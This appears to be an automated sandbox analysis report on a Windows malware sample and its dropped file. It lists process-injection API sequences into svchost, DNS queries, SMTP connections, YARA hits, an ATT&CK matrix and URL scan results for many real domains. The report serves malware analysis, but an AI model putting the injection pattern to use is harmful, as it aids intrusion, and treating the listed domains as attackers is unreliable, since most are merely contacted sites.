                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jacomfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.129.18 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jchysk.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pwd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.xaicom.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.crcsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pcgrate.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.210.36.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cel-cpa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.155.104 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.186.187.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.54.117.242 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nme.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.otena.com
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFA0000Jump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 24C0008Jump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D68008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31EE008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 313A008Jump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E6B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_040020B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,0_2_040020B0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,0_2_04002510
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02523CD7 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,0_2_02523CD7
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,1_2_04002510
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0010A397 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0010A397
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_000F4890 _memset,GetVersionExA,0_2_000F4890

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f523c7.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.252053f.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.25223c7.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.25223c7.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.9423c7.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.984088.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.9423c7.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f5053f.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.94053f.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f5053f.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.94053f.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.2b54088.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f523c7.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.2554088.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.984088.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.2554088.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.252053f.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.2b54088.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.719025818.0000000002B54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.714243220.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.720083201.0000000002554000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.714052838.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.714796966.0000000000984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Command and Scripting Interpreter
                      1
                      Registry Run Keys / Startup Folder
                      511
                      Process Injection
                      111
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium21
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts4
                      Native API
                      Boot or Logon Initialization Scripts1
                      Registry Run Keys / Startup Folder
                      1
                      Disable or Modify Tools
                      LSASS Memory231
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                      Virtualization/Sandbox Evasion
                      Security Account Manager21
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)511
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer25
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem15
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 879119 Sample: fs7AQcREFX.exe Startdate: 31/05/2023 Architecture: WINDOWS Score: 100 53 wnit.org 2->53 55 websy.com 2->55 57 395 other IPs or domains 2->57 91 Snort IDS alert for network traffic 2->91 93 Antivirus detection for URL or domain 2->93 95 Multi AV Scanner detection for submitted file 2->95 101 2 other signatures 2->101 8 pigalicapi.exe 48 2->8         started        12 fs7AQcREFX.exe 3 68 2->12         started        15 pigalicapi.exe 48 2->15         started        signatures3 97 System process connects to network (likely due to code injection or exploit) 55->97 99 Tries to resolve many domain names, but no domain seems valid 55->99 process4 dnsIp5 59 skgm.ru 8->59 67 169 other IPs or domains 8->67 103 Multi AV Scanner detection for dropped file 8->103 105 Found stalling execution ending in API Sleep call 8->105 107 Contains functionality to inject threads in other processes 8->107 109 Contains functionality to compare user and computer (likely to detect sandboxes) 8->109 17 svchost.exe 8->17         started        61 www.abart.pl 12->61 69 183 other IPs or domains 12->69 37 C:\Users\user\pigalicapi.exe, PE32 12->37 dropped 39 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 12->39 dropped 111 Drops PE files to the user root directory 12->111 113 Contains functionality to inject code into remote processes 12->113 115 Writes to foreign memory regions 12->115 21 svchost.exe 12->21         started        23 svchost.exe 12->23         started        63 www.sjbs.org 15->63 65 sidepath.com 15->65 71 154 other IPs or domains 15->71 117 Injects a PE file into a foreign processes 15->117 25 svchost.exe 15->25         started        file6 119 Tries to resolve many domain names, but no domain seems valid 61->119 121 System process connects to network (likely due to code injection or exploit) 65->121 signatures7 process8 dnsIp9 41 smtp.mail.global.gm0.yahoodns.net 17->41 43 smtp.mail.yahoo.com 17->43 45 gmail-smtp-in.l.google.com 17->45 87 Injects a PE file into a foreign processes 17->87 27 svchost.exe 12 17->27         started        31 svchost.exe 17->31         started        33 svchost.exe 17->33         started        35 svchost.exe 17->35         started        47 smtp.mail.global.gm0.yahoodns.net 25->47 49 smtp.mail.yahoo.com 25->49 51 smtp.live.com 25->51 89 System process connects to network (likely due to code injection or exploit) 25->89 signatures10 process11 dnsIp12 79 94 other IPs or domains 27->79 123 System process connects to network (likely due to code injection or exploit) 27->123 81 89 other IPs or domains 31->81 73 oaith.ca 33->73 83 122 other IPs or domains 33->83 75 www.vexcom.com 35->75 77 www.abdg.com 35->77 85 249 other IPs or domains 35->85 signatures13 125 Tries to resolve many domain names, but no domain seems valid 75->125

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      fs7AQcREFX.exe24%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\pigalicapi.exe24%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.ora-ito.com/~-0%Avira URL Cloudsafe
                      http://www.owsports.ca//F0%Avira URL Cloudsafe
                      http://www.stnic.co.uk/g170%Avira URL Cloudsafe
                      http://www.dgmna.com/z0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.7.10%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.500%Avira URL Cloudsafe
                      http://www.abdg.com/$0%Avira URL Cloudsafe
                      https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                      https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                      https://pohlfood.com/#website0%Avira URL Cloudsafe
                      http://a-domani.com/0%Avira URL Cloudsafe
                      http://skypearl.com/0%Avira URL Cloudsafe
                      https://www.medius.si/0%Avira URL Cloudsafe
                      http://fdlymca.org/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                      http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                      https://www.alantron.com/turkce/destek/search.to0%Avira URL Cloudsafe
                      http://www.elpro.si/0%Avira URL Cloudsafe
                      http://www.hummer.hu/oK0%Avira URL Cloudsafe
                      http://www.credo.edu.pl/100%Avira URL Cloudmalware
                      http://www.valselit.com/174-appartement-a-vendre-grenoble-305140%Avira URL Cloudsafe
                      https://www.pwd.org/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                      http://sigtoa.com/0%Avira URL Cloudsafe
                      http://likangds.com/0%Avira URL Cloudsafe
                      http://univi.it/0%Avira URL Cloudsafe
                      http://www.item-pr.com/q80%Avira URL Cloudsafe
                      https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                      https://www.aevga.com/0%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                      http://www.naoi-a.com/0%Avira URL Cloudsafe
                      http://www.evcpa.com/nJ0%Avira URL Cloudsafe
                      http://www.iamdirt.com/6-b0%Avira URL Cloudsafe
                      http://www.abdg.com/0%Avira URL Cloudsafe
                      http://www.pwd.org/d0%Avira URL Cloudsafe
                      http://www.nunomira.com/ll0%Avira URL Cloudsafe
                      http://hes.pt/0%Avira URL Cloudsafe
                      http://www.valselit.com/177-appartement-a-vendre-sigean-303780%Avira URL Cloudsafe
                      http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=16853827670%Avira URL Cloudsafe
                      http://www.11tochi.net/iW0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                      https://www.olras.com/5;0%Avira URL Cloudsafe
                      http://www.pwd.org/r0%Avira URL Cloudsafe
                      http://gholographic.com/0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                      http://calvinly.com/0%Avira URL Cloudsafe
                      http://www.olras.com/J0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                      http://www.alteor.cl/osoft0%Avira URL Cloudsafe
                      https://www.ora-ito.com/0%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e0%Avira URL Cloudsafe
                      http://www.crcsi.org/a0%Avira URL Cloudsafe
                      https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                      http://myropcb.com/login/0%Avira URL Cloudsafe
                      http://www.winhui.cn/template/default/img/fixedimg4.png0%Avira URL Cloudsafe
                      http://www.mobilnic.net/Z0%Avira URL Cloudsafe
                      http://www.pb-games.com/Q0%Avira URL Cloudsafe
                      https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
                      http://www.credo.edu.pl/&100%Avira URL Cloudmalware
                      https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
                      http://www.petsfan.com/q&m0%Avira URL Cloudsafe
                      http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.130%Avira URL Cloudsafe
                      http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.70%Avira URL Cloudsafe
                      https://www.alantron.com/turkce/web-hosting/garanti.to0%Avira URL Cloudsafe
                      http://www.ora-ito.com/0%Avira URL Cloudsafe
                      http://www.myropcb.com/why-use-myro/terms-of-service/0%Avira URL Cloudsafe
